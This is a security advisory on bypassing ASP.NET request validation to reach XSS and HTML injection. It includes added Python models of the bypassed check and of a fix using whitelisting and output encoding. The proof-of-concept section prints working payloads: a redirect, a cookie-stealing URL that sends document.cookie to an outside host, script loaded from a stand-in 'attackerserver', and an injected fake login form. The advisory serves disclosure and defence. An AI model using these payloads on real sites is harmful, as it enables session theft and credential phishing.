
Microsoft .NET request filtering bypass vulnerability (BID 20753)



FYI,

The following are the technical details for the Microsoft .NET request 
filtering bypass vulnerability (BID 20753):


ProCheckUp Security Bulletin 

This advisory has been published following consultation with UK CPNI (formerly 
known as NISCC) 

Title: Microsoft ASP.NET request filtering can be bypassed allowing XSS and 
HTML injection attacks


CERT: None


Date found: 7 July, 2006

The following client/server environment was tested and found vulnerable:

- Microsoft Windows Server 2003 Standard Edition Build 
3790.srv03_sp1_rtm.050324-1447 Service Pack 1
- Microsoft IIS 6.0
- Microsoft ASP .NET Framework Version 2.0.50727.42
- Microsoft Internet Explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519
- Microsoft Internet Explorer 7.0.5450.4 Beta 3
- Microsoft Internet Explorer 7.0.5730.11


Severity: Medium


Credits: request filtering bypass found by Richard Brain and further researched 
by Jan Fry and Adrian Pastor


Vendor Status: N/A


CVE Candidate: Not assigned


Description: 

By studying how ASP .NET request filtering (the request validation feature that 
rejects requests containing what it regards as dangerous markup) decides what to 
block, ProCheckUp has found that it can be bypassed, allowing XSS and HTML 
injection attacks against applications that depend on it.

It was possible to perform redirect, cookie-theft and unrestricted HTML 
injection attacks against an ASP .NET application set up in a test environment. 
ProCheckUp has also found this issue to be exploitable while carrying out 
penetration tests on several customers' live environments.


Notes:

To exploit this flaw, an attacker needs to target an ASP .NET server-side 
application that echoes a request parameter back to the browser without 
encoding or otherwise sanitising it, relying on request filtering alone.


Proof of concept:

In the following examples 'vuln-search.aspx' is a script that relies solely on 
ASP .NET request filtering and returns the user-supplied 'term' parameter to 
the browser unmodified.

Alert box injection - provided for testing purposes only (on Internet Explorer 
the expression() is re-evaluated repeatedly, so the alert keeps reappearing and 
can effectively lock up the browser)
http://target/vuln-search.aspx?term=</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>

Redirection attack
http://target/vuln-search.aspx?term=</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com")>

Cookie stealing
http://target/vuln-search.aspx?term=</XSS/*-*/STYLE=xss:e/**/xpression(window.location="http://www.procheckup.com/cookiemonster.php?sid="%2bdocument.cookie)>

Unrestricted HTML injection from an external '.js' file
http://target/vuln-search.aspx?term=</XSS/*-*/STYLE=xss:expression(myScript=document.body.appendChild(document.createElement("script")))></XSS/*-*/STYLE=xss:expression(myScript.setAttribute("src","http://attackerserver/xss.js"))>

where 'xss.js' could contain a snippet that overwrites the entire document's 
HTML body with, for example, a fake login form:

document.body.innerHTML = '<b>since we can now insert brackets without having to 
escape the request filtering, we\'re free to insert any HTML tags</b><br/><form 
name="myform" action="http://www.procheckup.com"><input type="text" 
name="login"><br/><input type="password" name="password"><br/><input 
type="submit" value="Login"></form>';
myform.login.focus();
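The following is an added example written for this page; it is not ProCheckUp's 
code and not Microsoft's validator. It is a simplified, assumed model of the 
request-validation check the payloads above slip past: the assumption, implied 
by the PoC results, is that the tested build only rejected '<' when followed by 
a letter or '!', and '&' when followed by '#', so an element beginning with '</' 
passed. The real check is the internal CrossSiteScriptingValidation class in 
System.Web; nothing below quotes it. The vuln_search() function and the page 
template are stand-ins for 'vuln-search.aspx'.

```python
# Added example for this page, not ProCheckUp's or Microsoft's code: an
# assumed, simplified model of the ASP .NET 2.0 request-validation rule that
# the advisory bypasses, plus a model of the echoing 'vuln-search.aspx' page.
import re

ALPHA = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ")

# The first two PoC payloads from the advisory, as the server sees them
# after URL decoding of the 'term' query-string parameter.
POC_ALERT = "</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>"
POC_REDIRECT = ('</XSS/*-*/STYLE=xss:e/**/xpression('
                'window.location="http://www.procheckup.com")>')


def is_dangerous_string(value: str) -> bool:
    """Assumed model of the bypassed check.  A '<' only counts as dangerous
    when the next character is a letter or '!'; '&' only when followed by '#'.
    A tag written as '</XSS...', as in the PoC, is therefore passed through."""
    for i in range(len(value) - 1):
        ch, nxt = value[i], value[i + 1]
        if ch == "<" and (nxt in ALPHA or nxt == "!"):
            return True
        if ch == "&" and nxt == "#":
            return True
    return False


def is_dangerous_string_hardened(value: str) -> bool:
    """The same model with '</' and '<?' added to the block list, which closes
    the hole the PoC uses.  It is still a blocklist, so it is no substitute for
    validating input and encoding output in the application itself."""
    for i in range(len(value) - 1):
        ch, nxt = value[i], value[i + 1]
        if ch == "<" and (nxt in ALPHA or nxt in ("!", "/", "?")):
            return True
        if ch == "&" and nxt == "#":
            return True
    return False


_CSS_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def css_expression_in(markup: str) -> bool:
    """True if the markup carries a CSS expression() once /**/ comments are
    stripped.  The PoC writes 'e/**/xpression' so that filters matching the
    literal keyword do not fire; with the comments removed the style engine
    is left with 'expression(' and evaluates the script inside it."""
    return "expression(" in _CSS_COMMENT.sub("", markup).lower()


def vuln_search(term: str) -> str:
    """Models 'vuln-search.aspx': run request validation, then echo the raw
    term into the page.  Raises on terms the (modelled) validator rejects."""
    if is_dangerous_string(term):
        # Mirrors the HttpRequestValidationException message ASP .NET raises.
        raise ValueError("A potentially dangerous Request.QueryString value "
                         "was detected from the client")
    return "<html><body><p>Results for: " + term + "</p></body></html>"


if __name__ == "__main__":
    samples = ["<script>alert(1)</script>", "&#60;script&#62;",
               POC_ALERT, POC_REDIRECT]
    for term in samples:
        try:
            page = vuln_search(term)
            print("PASSED validation; expression() in page:",
                  css_expression_in(page), "|", term)
        except ValueError:
            print("BLOCKED by validation |", term)
```

Running the block shows the classic '<script>' and '&#60;' forms blocked while 
both '</XSS...' payloads reach the page with a live expression() in them; the 
hardened variant rejects them, but only because '</' was added to a list, which 
is exactly the kind of dependency the Fix section warns against.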


Consequences: 

Attackers can hijack user accounts, through cookie theft or injected login 
forms, by mounting XSS and HTML injection attacks against applications that 
rely solely on ASP .NET request filtering for protection.


Fix:

Do not rely on ASP .NET request filtering as a protection. Validate every input 
parameter on the server side against a whitelist of the characters and values 
the application actually expects, and HTML-encode all user-supplied data before 
it is written into a page (HttpUtility.HtmlEncode / Server.HtmlEncode in 
ASP .NET), so that a validation gap cannot turn into script execution.
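The following is an added example written for this page, not ProCheckUp's code, 
showing the fix applied to a stand-in for 'vuln-search.aspx'. It models in 
Python what the ASP .NET application should do itself: whitelist the 'term' 
parameter, then HTML-encode anything echoed back (html.escape here does what 
HttpUtility.HtmlEncode does in ASP .NET). The 64-character alphanumeric 
whitelist and the page template are assumptions chosen for illustration.

```python
# Added example for this page, not ProCheckUp's code: whitelist validation
# plus output encoding for the echoing search page, beside the original
# behaviour for comparison.  The whitelist regex and templates are assumptions.
import html
import re

# Whitelist: what a search term is allowed to look like.  Anything outside
# this set is rejected before the value reaches any rendering code.
SEARCH_TERM = re.compile(r"[A-Za-z0-9 ._-]{1,64}")

# The alert payload from the advisory's proof of concept, URL-decoded.
POC = "</XSS/*-*/STYLE=xss:e/**/xpression(alert('XSS'))>"


def validate_search_term(term: str) -> bool:
    """Positive validation: the whole value must match the whitelist."""
    return SEARCH_TERM.fullmatch(term) is not None


def encode_for_html(text: str) -> str:
    """Encode the characters that break out of HTML text and attribute
    context (& < > " ').  html.escape(quote=True) covers all five."""
    return html.escape(text, quote=True)


def search_page_vulnerable(term: str) -> str:
    """Original behaviour: trusts request filtering and echoes the term raw."""
    return "<p>Results for: " + term + "</p>"


def search_page_fixed(term: str) -> str:
    """Whitelist first and never echo a rejected value; encode on output
    regardless, so a later loosening of the whitelist cannot reintroduce
    injection on its own."""
    if not validate_search_term(term):
        return "<p>Invalid search term.</p>"
    return "<p>Results for: " + encode_for_html(term) + "</p>"


def reflected_unencoded(page: str, term: str) -> bool:
    """True if the attacker-controlled term appears verbatim in the page,
    i.e. the markup it carries would be parsed as markup by the browser."""
    return term in page


if __name__ == "__main__":
    for term in ["asp.net", POC]:
        print("vulnerable:", search_page_vulnerable(term))
        print("fixed:     ", search_page_fixed(term))
        print("encoded:   ", encode_for_html(term))
        print()
```

The two layers fail independently: if the whitelist is ever relaxed to admit 
'<', the encoded output still renders the payload as inert text ('&lt;/XSS...'), 
and if encoding is forgotten on one page, the whitelist still keeps the payload 
out of the application.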


References: 

http://www.procheckup.com/Vulner_PR0703.php
http://www.securityfocus.com/bid/20753/
http://www.cpni.gov.uk/docs/re-20061020-00710.pdf
http://www.owasp.org/index.php/Category:OWASP_.NET_Project


Legal:

Copyright 2007 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet 
community for the purpose of alerting them to problems, if and only if, the 
Bulletin is not edited or changed in any way, is attributed to Procheckup, and 
provided such reproduction and/or distribution is performed for non-commercial 
purposes.

Any other use of this information is prohibited. Procheckup is not liable for 
any misuse of this information by any third party.